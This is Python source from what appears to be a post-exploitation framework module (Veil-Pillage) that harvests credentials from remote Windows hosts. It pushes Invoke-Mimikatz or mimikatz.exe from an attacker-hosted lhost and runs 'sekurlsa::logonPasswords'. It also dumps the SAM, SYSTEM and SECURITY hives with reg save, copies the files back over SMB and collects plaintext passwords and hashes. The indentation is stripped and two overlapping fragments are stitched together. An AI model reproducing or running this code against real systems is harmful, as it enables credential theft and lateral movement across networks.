allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = "powershell.exe -c \"$a=42;$a\""
powershellResult = command_methods.executeResult(
target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42": powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " +
target,
warning=True)
print helpers.color(
"\n [*] Using reg.exe save method for hash dumping on " +
target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password,
regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\system",
delete=False)
securityFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\security",
delete=False)
samFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\sam",
delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/system', 'w')
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/security', 'w')
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/sam', 'w')
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target,
"creddump.txt", out)
self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(
target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult: arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod="wmis",
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
lhost = self.required_options["lhost"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# let's keep track of ALL plaintext credentials found
allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
for target in self.targets:
print "\n [*] Executing mimikatz on "+target
# first, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)
# if there's a failure in this initial execution, go to the next target
if "error" in archResult:
self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
continue
arch = "x86"
if "64" in archResult: arch = "x64"
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# now time for mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"
# host the arch-correct mimikatz.exe and trigger it with the appropriate arguments
delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)
print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# append the total mimikatz creds if we have any
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
